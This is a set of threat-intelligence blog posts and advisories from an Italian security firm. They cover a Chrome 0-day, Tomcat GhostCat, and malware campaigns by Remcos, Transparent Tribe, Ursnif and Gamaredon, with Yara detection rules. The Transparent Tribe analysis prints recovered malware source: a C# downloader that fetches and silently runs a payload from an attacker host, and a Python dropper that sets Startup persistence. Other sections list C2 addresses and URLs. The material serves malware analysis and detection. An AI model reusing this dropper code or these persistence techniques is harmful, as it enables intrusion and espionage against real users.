Vulnerabilità 0-Day su Google Chrome

Proto: N060220.

Con la presente Yoroi desidera informarLa ad una vulnerabilità 0-Day scoperta su Google Chrome, il web browser più diffuso in ambito privato e tra i più utilizzati anche in ambienti professionali. La criticità è nota con l’identificativo CVE-2020-6418.

La problematica è causata da lacune nella gestione dei tipi di dato all’interno del motore JavaScript V8 di Google Chrome, tale circostanza permette ad un attaccante remoto di eseguire codice arbitrario sul sistema bersaglio previa la navigazione su pagine web malevole o compromesse, aprendo così a scenari di rischio legati ad attacchi “Watering Hole” o “Exploit Kit”.

Il Produttore ha confermato la problematica rilasciando la versione 80.0.3987.122 del browser per sistemi Window, Linux e Mac in grado di risolvere la problematica.

I ricercatori del GTAG hanno inoltre confermato che la vulnerabilità è attualmente sfruttata per in operazioni di attacco 0-day, pertanto, considerata la potenziale diffusione del browser anche all’interno delle reti aziendali, Yoroi consiglia caldamente di applicare le patch di sicurezza rese disponibili dal produttore al parco macchine client.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index.

New Cyber Attack Campaign Leverages the COVID-19 Infodemic

Introduction

Nowadays, it is common to say that the physical world and the cyber world are strictly connected. The proof is the leverage of the current physical threat, the CoronaVirus, as a social engineering trick to infect the cyber world. It is not new for cyber-crooks to exploit social phenomena to spread malware in order to maximize the impact and dissemination of a malicious campaign. This is the case of the Greta Thunberg phenomenon exploited in recent Emotet campaigns or the holiday themed campaign spread a few months ago.

Indeed, during  the last month, a new virus, dubbed “Corona Virus” codename COVID-19 has been arising, infecting thousands of people in China, and also all around the world. 

The statistics are worrying, and, of course, they represent an opportunity for cyber-crooks. This kind of threat is opportunistic by design, aimed to hit everyone without any specific target. In an opportunistic attack scenario the malware is spread across a huge number of victims taking advantages of an early disclosed vulnerability and the time frame for patching it or taking advantages of a widespread phenomena such as in this case.

Threat actors are using fear and panic caused by the spread of the virus to deliver their malicious artifacts and increase the number of infected victims, making it look like a “Coronavirus countermeasures” document.

Kaspersky and IBM X-Force have recently discovered an Emotet campaign delivered on Corona Virus trend. In this case, based on the analysis of the shared IoC, all the identified samples are not new and were reused with some small changes. then delivered in China regions spread via a malicious decoy document, emphasizing the opportunistic nature of these attacks.

During our Threat Intelligence activities we noticed a suspicions artifact named “CoronaVirusSafetyMeasures_pdf”, so, intrigued by its name and by its recent submission on Yomi Hunter (LINK), we decided to deep dive into it.

Technical Analysis

Probably, the infection vector was a phishing mail containing a specific attachment. However, detailed information about the vector used to spread the malware are unknown. Our analysis, therefore, begins with the executable recovered from the Yomi Sandbox.

Hashc9c0180eba2a712f1aba1303b90cbf12c1117451ce13b68715931abc437b10cd
ThreatObfuscated Remcos RAT Dropper
Ssdeep768:dBbjxSuO05cYJAsq4XqkDSUWvcDD5Ebcoq:dSuT5cYJAsq4XqkxWID6m

Table 1. Sample information

The sample showed an interesting behavior, it established a TLS protected connection to a file sharing platform named “share.]dmca.]gripe”, possibly to avoid reputation warnings raised by next-gen firewalls.

Figure 2: URL in the dropper configuration

Figure 3: Dashboard of the file hosting service used

The file downloaded from this censorship free file hosting is actually a chunk of 125KB random looking bytes, suggesting it would likely be some binary payload protected with strong encryption.

Figure 4: Piece of the encrypted file downloaded from “share.]dmca.]gripe”

In the meantime, the malware writes two artifacts in the “C:\Users\<username>\Subfolder” system directory. Inside it,  two files named “filename1.vbs” and “filename1.exe” appeared.

Figure 5: Installed files

The content of the VBScript is straightforward: it simply is the launching point to run executable file. 

Figure 6: Body of the VBS script

The reboot survival of the infection is granted through the setup of the registry key “HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce”. A classical trick we keep noticing in a very huge number of malware implant, led us to think it actually still able to serve its malicious purpose even after decades, even after all the research community is fully aware of it.

Figure 7: Evidence of the set of the registry key

Then, the malicious code stores sensitive information gathered from the monitoring of user keypress in a file named “logs.dat”, placed in the  “%AppData%\Local\Temp\onedriv” directory. Different from the default Remcos working directory.

Figure 8: Path and file containing the sensitive information about the victim 

Finally, all the loot is sent to the remote command and control hosted at 66.154.98.108, operated by “Total server solutions LLC”, an US hosting provider operating since 2012.

Figure 9: C2 connection

Intercepting the malware process communications we noticed the usage “|cmd|” delimiter, a typical pattern confirming the final payload is a customized built of Remcos, also revealing the identifier of the attack campaign configured by the crooks: “j8gb-GBATN3”.

Figure 10: Piece of network communication intercepted

A summary of the infection chain can be represented by the following schema.

Figure 11: Malware attack chain

Conclusion

The COVID-19 phenomenon is scaring entire populations all around the world, many times raising panic and irrational or dangerous individual behaviors of a lot of people often pushed by some kind mass media narratives designed to leverage their uncertainty and emotional reactions, rather than inform them.

Cyber criminals are greedily looking at this kind of narrative and are launching wide-spread, opportunistic cyber attacks to exploit the irrational behaviors of the individuals overwhelmed by the COVID-19 infodemic. 

The ZLab-Yoroi Cybaze researchers advise to maintain a high attention level when receiving or treating communications claiming to be related to the CoronaVirus phenomenon, to avoid panic clicking on the link coming from unattended source and to contact trusted experts in case of the doubts. 

Indicator of Compromise 

Yara Rules

import "pe"
rule Remcos_RAT_COVID19_Feb_2020 {
    meta:
      description = "Yara rule for the Remcos RAT Feb_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-25"
      tlp = "white"
      category = "informational"
    
strings:
      	 $a1 = {ED C3 37 D7 6F C7 E0 2F 7B BA DA}
     	 $a2 = {4D 53 56 42 56 4D 36 30}
	 $a3 = "VB5!6&*"
	 $a4 = "Khedivi"
	 $a5 = "|dbdU79?B_|"
	 $a6 = "Altsaxu1"
	  
    condition:
      uint16(0) == 0x5A4D and pe.number_of_sections == 3 and (3 of ($a*)) 
}

This blog post was authored by Davide Testa, Maria Francesca Lepore, Antonio Pirozzi and Luca Mella of Cybaze-Yoroi ZLAB

Grave Vulnerabilità in Apache Tomcat (GhostCat)

Proto: N050220.

Con la presente Yoroi desidera informarLa riguardo alla recente scoperta di una grave vulnerabilità all’interno dei Apache Tomcat, noto Application Server utilizzato per la realizzazione applicazioni anche in ambienti enterprise. La criticità è nota con l’alias “GhostCat”, referenziata con gli identificativi CVE-2020-1398 e CNVD-2020-10487. 

La problematica è causata da lacune nella gestione degli input utente all’interno del connettore AJP (Apache JServ Protocol) di Tomcat, utilizzato per integrare l’application server in architetture bilanciate o a valle di reverse proxy. Tali lacune rendono possibile ad un attaccante remoto privo di autenticazione di prelevare file di configurazione di sistema, permettendogli così di recuperare credenziali amministrative utilizzabili per accedere abusivamente ai server bersaglio, compromettendone i dati e la sicurezza delle reti locali. Inoltre, il connettore AJP risulta abilitato di default nelle configurazioni di Tomcat sulla porta di rete 8009. 

Il Manutentore ha risolto la problematica rilasciando nuove versioni di Apache Tomcat 7, 8 e 9, ma non della versione 6 in quanto fuori supporto. In particolare risultano afflitte dalla vulnerabilità le versioni:

Per via della potenziale diffusione di servizi e applicazioni basate su Apache Tomcat, della recente pubblicazione di dettagli tecnici e strumenti volti a sfruttare la vulnerabilità. Yoroi consiglia di limitare l’esposizione di rete del connettore AJP e di applicare gli aggiornamenti resi disponibili dal Manutentore. 

Nel caso non sia possibile applicare celermente le patch, Yoroi consiglia di valutarne la disabilitazione del connettore qualora non utilizzato, oppure di proteggere il connettore tramite password attraverso l’inserimento della direttiva “secret” oppure “requiredSecret” all’interno del file di configurazione “/conf/server.xml”. 

Figura. Esempio configurazione connettore AJP protetto da password.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index.

Transparent Tribe: Four Years Later

Introduction

Operation Transparent Tribe was first spotted by Proofpoint Researchers in Feb 2016, in a series of espionages operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the sources IP in Pakistan, the attacks were part of a wider operation that relies on multi vector such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RAT are capable of exfiltrate information, take screenshot and record webcam streams.

This threat actor has been vanished for a long period, and only the last month appeared another time probably for the actual tensions between two countries. We noticed that the TTP of the group are almost the same leveraging a weaponized document with a fake certificate of request of an Indian public fund. So, Cybaze-Yoroi ZLab team decided to dive deep into a technical analysis.

Technical Analysis

Hash662c3b181467a9d2f40a7b632a4b5fe5ddd201a528ba408badbf7b2375ee3553
ThreatNew Operation Transparent Tribe Campaign
Brief DescriptionMalicious macro document of the new Campaign of Transparent Tribe
Ssdeep24576:Nh2axIaansJlyJ1prFnFmbX3ti6iEIb+R9mSXH9tBUnTqHT:Nhfx4nsPyJ1ppnEX3UCICRhXHXe

Table 1. Static information about the malicious macro 

The document presents itself as a request for a DSOP FUND (Defence Services Officers Provident Fund). It is a fund where an officer compulsorily deposits some money to Govt on a monthly basis out of his wages / salary. 

The Found is a financial planning for defense personnel. The money is kept by the government and in return a “non-permanent” profit officially titled as “interest” is given back to the officers at the end of each year. The DSOP fund scheme has been setup as a “welfare measure” to the depositors while the wages remain barely meeting ends otherwise.

Self-Extracting Macro

Analyzing the content of the Excel file, we notice that the file contains all the necessary components to perform the infection:

The macro is not heavily obfuscated. The macro components are hidden as Hex or Decimal strings, which will be combined with each other to unleash the next stage of the infection.

Then it is possible to deobfuscate them.

The macro creates two folders inside %PROGRAMDATA% path, “systemidleperf” and “SppExtComTel”. 

Analyzing these files, we have a vbs script, a C# script and a zip file, inside this archive we found 4 PE artifacts:

The SilentCMD Module

The two dll are legit windows library and are used in support of the malicious behaviour. Instead, the “windproc.scr” and “windprocx.scr” files are the compiled version of the utility SilentCMD publicly available on GitHub. SilentCMD executes a batch file without opening the command prompt window. If required, the console output can be redirected to a log file.

The SilentCMD utility is used to execute the commands pushed from the C2, and all of them will be executed without showing anything to the user. However, as previously mentioned, it is curious to notice that the malware installs two different variants of the executable, with the only difference in timestamp:

The Real Time Module

The other extracted file is the “Realtime.cs” file, which is the source of a piece of code written in C#, and it is compiled and run during the execution of the macro. The code is very simple and it has the only purpose to download another component from the internet: 

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;
namespace Realtime
{
    class Program
    {
        static void Main(string[] args)
        {
            
            WebClient wc = new WebClient();
            wc.DownloadFile("http://www.awsyscloud.com/x64i.scr", @"c:\\programdata\\systemidleperf\\x64i.scr");
            Process proc = new Process();
            proc.StartInfo.FileName = Convert.ToString(args[0]);
            proc.StartInfo.Arguments = "/c " + Convert.ToString(args[1]);
            proc.StartInfo.UseShellExecute = false;
            proc.StartInfo.CreateNoWindow = false;
            proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            proc.Start();
            Environment.Exit(0);
            //Application.Exit();
            /* if (!proc.Start())
             {
                 //Console.WriteLine("Error starting");
                 return;
             }*/
            //proc.WaitForExit();
        }
    }
}

The code is really simple, it has the function of downloading the file “x64i.scr” from the dropurl “awsysclou[.com” and then saves it into the folder “c:\programdata\systemidleperf\”. The file is immediately executed through the C# primitives.

The X64i.scr File

Hash7b455b78698f03c0201b2617fe94c70eb89154568b80e0c9d2a871d648ed6665
ThreatNew Operation Transparent Tribe Campaign
Brief DescriptionPython stub malware of the new Campaign of Transparent Tribe
Ssdeep196608:jXm2jfTjEzWt7+eW3TAPHULULN3erOAjsjAbpSzZTfuHO0y7:Lm2jfTgWt65U4UL9eCDHzZfyG7
Icon

Table 2. Static information about the Pyhton Stub

The icon of the executable let us understand that the malware has been forged through the usage of the tool Pyinstaller. It is a tool that permits a user to create a complete self-contained executable starting from a python source code. However, the two main disadvantages of choosing this solution are the high footprint of the executable (reaching more than 7.5MB and this generates a lot of noise inside the system); and the easiness to reverse the executable to obtain the source code.

So, after the operation of reversing, the extracted code of the malware is the following:

from ctypes import *
import socket, time, os, struct, sys
from ctypes.wintypes import HANDLE, DWORD
import platform
import ctypes
import _winreg
import time
import os
import platform
import binascii
import _winreg
import subprocess
bitstream3 = "PAYLOAD_ONE"
bitstream4 = "PAYLOAD_TWO"
oses = os.name
systems = platform.system()
releases = platform.release()
architectures = platform.architecture()[0]
    
def main():
  try:
    runsameagain()
  except Exception as e:
      print str(e)
  
def runsameagain():
    global bitstream3
    binstr = bytearray(binascii.unhexlify(bitstream3))
    if not os.path.exists("c:\programdata\SppExtComTel"):
        os.makedirs("c:\programdata\SppExtComTel")
    WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr);
    bootup()
    subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance'])
  
def rundifferentagain():
    global bitstream4
    binstr = bytearray(binascii.unhexlify(bitstream4))
    if not os.path.exists("c:\programdata\SppExtComTel"):
        os.makedirs("c:\programdata\SppExtComTel")
    WriteFile("c:\programdata\SppExtComTel\SppExtComTel.scr",binstr);
    bootup()
    subprocess.Popen(["c:\programdata\SppExtComTel\SppExtComTel.scr", '--brilliance'])
  
def Streamers():     
 try:                               
    rundifferentagain()
    return 1               
 except Exception as e:
    print str(e)
    
def WriteFile(filename,data):
    with open(filename,"wb") as output:
  output.write(data)
  
  
def bootup():
    try:
        from win32com.client import Dispatch
        from win32com.shell import shell,shellcon
  dpath = "c:\programdata\SppExtComTel"
        #print "before"
  Start_path = shell.SHGetFolderPath(0, shellcon.CSIDL_STARTUP, 0, 0)
  com_path = os.path.join(Start_path, "SppExtComTel.lnk")
  target = os.path.join(dpath,"SppExtComTel.scr")
  wDir = dpath
  icon = os.path.join(dpath, "SppExtComTel.scr")
  shell = Dispatch('WScript.Shell')
  shortcut = shell.CreateShortCut(com_path)
  shortcut.Targetpath = target
  shortcut.WorkingDirectory = wDir
  shortcut.IconLocation = icon
  shortcut.save()
        #print "there"
        #return True
    except Exception, e:
        print str(e)
    
if __name__ == "__main__":
  try:
      #print oses
      #print systems
      #print releases
      #print architectures
      if '.py' not in sys.argv[0]:
    #sys.exit()
                #print "nothign to do"
                if systems == 'Windows' and releases == "7":
                    main()
                elif systems == 'Windows' and (releases == "8.1" or releases == "8"):
                    Streamers()
                elif systems == 'Windows' and releases == "10":
                    #print "Please use a 64 bit version of python"
                    #print "entering streamers"
                    Streamers()
                else:
                    Streamers()
  except Exception as e:
    print str(e)

Code snippet 2 

The python code is very simple to analyze and to explain. The first operation is to declare two global variables, “bitstream3” and “bitstream4”. They are the hexadecimal representation of two PE files, that will be deepened in the next sections. These two files are chosen according to the Windows OS version, as visible at the bottom of the code.

After that, the script writes the desired payload into the folder “c:\programdata\SppExtComTel\” and immediately executed it with the parameter “–brilliance”. After that, the malware guarantees its persistence through the  creation of a LNK file inside the Startup folder.

The RAT

As previously stated, the malware payload is the core component of the malware implant. 

As shown in the above figure, the malware is written in .NET framework and the creation date back to 29 Jan 2020. It is the date of the beginning of the malware campaign, also demonstrated by the registration records of the C2. The malware consists of a modular implant that downloads other components from the C2.

The first operation is to provide to the C2 a list of the running processes on the victim machine: 

The method used to send the information to the C2 is the following:

Figure 11: C2 communication routine

After that, the malware loops in a cycle and waits for some commands coming from the C2:

Figure 12: Routine for the download of new modules

When the C2 sends some commands to instruct the bot, the malware downloads and executes other two components, which are two DLLs downloaded from the following URLs:

The first DLL, once executed, has been renamed in “indexerdervice.dll”. This executable has got a sophisticated encryption method of communication with the C2: 

When the C2 sends some commands to instruct the bot, the malware downloads and executes other two components, which are two DLLs downloaded from the following URLs:

The first DLL, once executed, has been renamed in “indexerdervice.dll”. This executable has got a sophisticated encryption method of communication with the C2: 

Figure 13: Evidence of the decrypting routine of the certificate

The above screen shows that the malware requests for an RSA key, which has to be validated by the highlighted text. If the check is positive, the malware can go on to its malicious actions, such as sending of information: 

Figure 14: Sending routine of the malware

The second malware module is a simple DLL having the purpose to download other components from the dropURL and then install it:

Figure 15: Evidence of the hard coded AES key

The downloaded code has been encrypted through the Rijndael algorithm with a hard coded key.

Conclusion

Transparent tribe is back with a new campaign after several years of (apparently) inactivity. We can confirm that this campaign is completely new, relying on the registration record of the C2 that dates back to 29 January 2020. The decoy document presents itself as a request for a DSOP FUND  (Defence Services Officers Provident Fund) a providence fund for official and military personnel, confirming the espionage and counterintelligence character of this campaign. 

At last, we have no certainty that this campaign has been inactive for 4 years, it may be that it acted quietly, but, now the cyber criminal group is back in view of today’s tensions between the two countries.

Indicators of Compromise

Yara Rules

rule TransparentTribe_Malicious_Macro_Jan_2020 {
    meta:
      description = "Yara rule for the Transparent Tribe Malicious Macro Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {8B 92 BC BE 87 95 BF BD 83}
      $a2 = {D6 8C C7 68 D5 8D C0 69 D4 8E}
	  $b1 = "161,36,31,130,137,165,44,167,244,55,198,100,241"
    condition:
      all of them
}

rule TransparentTribe_PythonStub_Jan_20 {
    meta:
      description = "Yara rule for the Transparent Tribe Python Stub Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {70 56 6B 77 86 FB D2 6D 2C}
      $a2 = {A2 43 F9 97 61 F4 E5 1F D7 02}
	  $b1 = "bpyexpat.pyd"
	  $b2 = "bmfc90u.dll"
	  
    condition:
      uint16(0) == 0x5A4D and all of them and filesize > 7MB
}

rule TransparentTribe_CrimsonRAT_Jan_20 {
    meta:
      description = "Yara rule for the Transparent Tribe CrimsonRAT Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {03 06 11 24 03 06 11 20 03}
      $a2 = {B0 3F 5F 7F 11 D5 0A 3A 04}
	  $b1 = "SppExtComTel"
	  
    condition:
      uint16(0) == 0x5A4D and all of them and filesize > 7MB
}

rule TransparentTribe_MaliciousDLLModule_Jan_20 {
    meta:
      description = "Yara rule for the Transparent Tribe CrimsonRAT Jan_2020 "
      author = "Yoroi - ZLab"
      last_updated = "2020-02-21"
      tlp = "white"
      category = "informational"
    strings:
      $a1 = {00 F1 01 8D 19 71 00 F1 01 7D 06 71}
      $a2 = {86 08 4E 03 57 00 59 00 CC}
	  $a3 = "6f6e6c79706172616e6f696473757276697665" ascii wide
  	  $a4 = "shemypolandar*kotlin" ascii wide
	  $b1 = "FC4302A8973108F7B86565D5A49182DED2B0BF31"
	  $b2 = "PrivateMemorySize64"
	  $b3 = "Hi0-78LoupIks2jMn" wide
    condition:
      uint16(0) == 0x5A4D and (all of ($a*) or all of ($b*)) 
}

This blog post was authored by Luigi Martire, Pietro Melillo and Antonio Pirozzi of Cybaze-Yoroi ZLAB

Nuova Campagna di Attacco Ursnif

Proto: N040220.

Con la presente Yoroi desidera informarLa ad un nuova campagna di attacco in corso ai danni di Aziende e utenti italiani. Gli attacchi si manifestano attraverso l’invio di email fraudolente a tema legale che invitano le vittime a scaricare e visionare li contenuto di un archivio compresso infetto.

L’archivio, una volta aperto, è potenzialmente in grado di compromettere la macchina bersaglio installando malware della famiglia Ursnif (TH-196), capace di intercettare digitazioni utente, sessioni web attive, fornire accesso backdoor e scaricare ulteriore malware.  

In particolare, la variante Ursnif propagata durante la campagna risulta digitalmente firmata da una compagnia Slovena. Tale circostanza può aumentare e probabilità di successo dell’attacco.  

Di seguito si riportano gli indicatori di compromissione estratti durante le analisi condotte:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro “cyber”. Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Launching the First “Yomi Hunting” Challenge!

About a year ago, we publicly released the Yomi Hunter sandbox for a few simple reasons: in Yoroi we believe in the InfoSec community value, we think it plays a central role in the fight of cyber-threats and we feel the need to support it. 

Our sentiment regarding the InfoSec community led us to support the Italian CTF team in their path to the final round of the European Cyber Security Challenge tournament last year. But, we also love to create things, so we were the first Italian Private Company launching and maintaining a public instance of the sandbox technology we developed across the years. 

It was natural for us to try to give back something to the community we believe in, concretely.

Today is different. 

Today, we’d love to challenge the malware community with the first “Yomi Hunting” contest. Literally, a malware and threat hunting contest with a simple and straightforward goal: hunt the bad guys.

So we are inviting malware analysts, security professionals and community researchers to feed the Yomi boxes with good malware, to stay in touch with the Yoroi twitter account to work with us and the other good guys.  

Of course, as every contest, “Yomi Hunting” has some cool prizes too, such as the possibility of the publication of a joint malware research with our Z-LAB, along with awards and other fun stuff we will ship to the most active researchers participating in the contest.

Well, how to participate?

It’s quite simple: Just go to the Yomi Hunter registration page, create a free community account, submit interesting samples and get in touch with us on our socials and share your findings! Or just include the "#yomihunter" hashtag to your tweets.

How it works?

The contest will start on 17 February 2020 and will end on 31 March 2020. At the end of the contest the three most active researchers submitting more samples will be rewarded with:

  1. First prize: backpack, shirt, agenda and gadgets
  2. Second place: shirt, agenda and gadgets
  3. Third place: agenda and gadgets

Every participant can monitor the chart through the Yomi Hunter "Wall of Fame" here.

~

Happy Hunting!

~

To join Yomi: The Malware Hunter and the "Yomi Hunting" contest sign in here!

Cyberwarfare: A deep dive into the latest Gamaredon Espionage Campaign

Introduction 

Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB (Federal Security Service) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power. 

Gamaredon has been active since 2014, and during this time, the modus operandi has remained almost the same. The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines. It is distributed in a spear phishing campaign with a weaponized office document that appears to be designed to lure military personnel. 

In the recent months, Ukrainian CERT (CERT-UA) reported an intensification of Gamaredon Cyberattacks against military targets. The new wave dates back to the end of November 2019 and was first analyzed by Vitali Kremez. Starting from those findings, Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant.

Technical Analysis

The complex infection chain begins with a weaponized Office document named “f.doc”. In the following table the initial malware information is provided.

Hash76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a
ThreatGamaredon Pteranodon weaponized document
Brief DescriptionDoc file weaponized with Exploit
Ssdeep768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir:uG1aKQ5OwCrItq3TgGfLt9r

Table 1. Information about initial dropper

The decoy document is written using the ukrainian language mixed to many special chars aimed to lure the target to click on it, and, once opened, it appears as in the following figure.

Figure 1. Overview of the document

The document leverages the common exploit aka template injection and tries to download a second stage from “hxxp://win-apu.]ddns.]net/apu.]dot”.

Figure 2. URL used by document to download the second stage

Thanks to this  exploit (Remote Code Execution exploit) the user interaction is not required, in fact the “enable macro” button is not shown. The downloaded document has a “.dot” extension, used by Microsoft Office to save templates for different documents with similar formats. Basic Information on the “.dot” file are provided:

Hashe2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8
ThreatGamaredon Pteranodon loader dot file
Brief DescriptionDot file enabling the infection of the Gamaredon Pteranodon
Ssdeep768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ:oI8XoWruHpp/P4

Table 2. Information about second stage

If we decide to open the document, we see that the document is empty, but it requires the enabling of the macro.

Figure 3. Overview of the second stage document

The body of the macro can be logically divided into two distinct parts: 

Figure 4. Code of the “template.vbs” stored in the Startup folder

The evidence of the written file in the Startup folder:

Figure 5. Evidence of the “template.vbs” file in the Startup folder

Analyzing the content of “templates.vbs” it is possible to notice that it define a variable containing a URL like “hxxp://get-icons.]ddns.]net/ADMIN-PC_E42CAF54//autoindex.]php” obtained from "hxp://get-icons.]ddns.]net/" & NlnQCJG & "_" & uRDEJCn & "//autoindex.]php", where “NlnQCJG” is the name that identifies the computer on the network and “uRDEJCn” is the serial number of drive in hexadecimal encoding. From this URL it tries to download another stage then storing it into “C:\Users\admin\AppData\Roaming\” path with random name. At the end, “templates.vbs” script will force the machine to reboot. 

Figure 6. Function used to force machine reboot

The dropped sample is an SFX archive, like the tradition of Gamaredon implants.

Hashc1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f
ThreatGamaredon Pteranodon implant SFX archive
Brief DescriptionSFX Archive First Stage 
Ssdeep24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv:zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv

Table 3. Information about first SFX archive

By simply opening the SFX archive, it is possible to notice two different files that are shown below and named respectively “8957.cmd” and “28847”. 

Figure 7. Content of the Gamaredon Pteranodon  SFX archive

When executed, the SFX archive will be extracted and the “8957.cmd” will be run. The batch script looks like the following screen:

Figure 8. Bat script source code (with junk instructions)

It contains several junk instructions with the attemption to make the analysis harder. Cleaning the script we obtain:

Figure 9. Batch script source code (cleaned)

At this point, the batch script renames the “28847” file in “28847.exe”, opens it using “pfljk,fkbcerbgblfhs” as password and the file contained inside the “28847.exe” file will be renamed in “WuaucltIC.exe”. Finally, it will be run using “-post.php” as argument.

The fact that the “28847.exe” file can be opened makes us understand that  the “28847” file is another SFX file. Some static information about SFX are:

Hash3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1
ThreatGamaredon Pteranodon implant SFX archive
Brief DescriptionSFX Archive Second Stage
Ssdeep24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM:OoZwxVvfoaPu

Table 4. Information about the second SFX archive

Exploring it, it is possible to see several files inside of it,  as well as the 6323 file. The following figure shows a complete list.

Figure 10. Content of the second SFX archive

In this case, the SFX archive contains 8 files: five of them are legit DLLs used by the “6323” executable to interoperate with the OLE format defined and used by Microsoft Office. The “ExcelMyMacros.txt” and “wordMacros.txt” files contain further macro script, described next. So, static analysis on the “6323” file shown as its nature: it is written using Microsoft Visual Studio .NET, therefore easily to reverse. Before reversing the executable, it is possible to clean it allowing the size reduction and the junk instruction reduction inside the code. The below image shows the information about the sample before and after the cleaning. 

Figure 11. Static information about .NET sample before and after the cleaning

The source code looks as follows. 

Figure 12. Part of .NET sample source code

The first check performed is on the arguments: if the arguments length is equal to zero, the malware terminates the execution. After that, the malware checks if the existence of the files “ExcelMyMacros.txt” and “wordMacros.txt” in the same path where it is executed: if true then it reads their contents otherwise it will exit. 

Figure 13. Function used by .NET sample to check the presence of the “WordMacros.txt” and the “ExcelMyMacros.txt” files”

Part of the content of the variable “xVGlMEP”:

Figure 14.Piece of the “WordMacros.txt” code

There is a thin difference between the two files. 

Figure 15. Difference between “WordMacros.txt” and  “ExcelMyMacros.txt” files”

As visible in the previous figure, the only difference between the files are in the variable, registry key and path used by Word rather than by Excel. Finally the macros are executed using the Office engine like in the following figure. 

Figure 16. Winword with malicious macro

So let’s start to dissect the macros. For a better comprehension we will be considering only one macro and in the specific case we will analyze “wordMacros.txt”  ones. First of all the macro will set the registry key "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & _"\Word\Security\" and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes: the first one will run a “IndexOffice.vbs” in the path “%APPDATA%\Microsoft\Office\” and the second one will run “IndexOffice.exe” in the same path. 

Figure 17. Registry keys and Scheduled tasks set by malware

Finally, the malware will write the “IndexOffice.txt” file in the  “%APPDATA%\Microsoft\Office\” path. The following figure shows what has been previously described:

Figure 18. Part of “IndexOffice.txt” file

The script will check the presence of the  “IndexOffice.exe” artifact: if true then it will delete it and it will download a new file/script from “hxxp://masseffect.]space/<PC_Name>_<Hex_Drive_SN>/post.]php”. 

Figure 19. Domain “masseffect.]space” declaration and use of the Encode function

The malware tries to save the C2 response and encoding it using Encode function. This function accepts three parameters: the input file, the output file and the arrKey; arrKey is calculated thanks to  GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results. Part of Encode function and complete code of GetKey function are shown below.

Figure 20. Encode function 

Figure 21. Function GetKey

Visiting the web page relative to C2, it shows a “Forbidden message” so this means that the domain is still active but refuses incoming requests.

Figure 22. Browser view of the URL “masseffect.]space” 

Conclusion

Gamaredon cyberwarfare operations against Ukraine are still active. This technical analysis reveals that the modus operandi of the Group has remained almost identical over the years. 

The massive use of weaponized Office documents, Office template injection, sfx archives, wmi and some VBA macro stages that dinamically changes,  make the Pterodon attack chain very malleable and adaptive. However, the introduction of a .Net component is a novelty compared to previous Pterodon samples.

Indicator of Compromise

Hashes

Persistence

URL

C2

Yara Rule

rule Gamaredon_Campaign_Genuary_2020_Initial_Dropper {
	meta:
  	description = "Yara Rule for Gamaredon_f_doc"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = { 4B 03 }
	 $a2 = { 8E DA 30 14 DD 57 EA 3F }
	 $a3 = { 3B 93 46 0F AF B0 2B 33 }
	 $a4 = { 50 4B 03 04 14 00 06 00 08 }

    condition:
   	 all of them
}
rule Gamaredon_Campaign_Genuary_2020_Second_Stage {
	meta:
  	description = "Yara Rule for Gamaredon_apu_dot"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2020-02-14"
  	tlp = "white"
  	category = "informational"

	strings:
   	 $a1 = "Menu\\Programs\\Startup\\\""
	 $a2 = "RandStrinh"
	 $a3 = ".txt"
	 $a4 = "templates.vbs"
	 $a5 = "GET"
	 $a6 = "Encode = 1032"
	 $a7 = "WShell=CreateObject(\"WScript.Shell\")"
	 $a8 = "Security"
	 $a9 = "AtEndOfStream"
	 $a10 = "GenRandom"
	 $a11 = "SaveToFile"
	 $a12 = "Sleep"
	 $a13 = "WinMgmts:{(Shutdown,RemoteShutdown)}!"
	 $a14 = "Scripting"
	 $a15 = "//autoindex.php"

    condition:
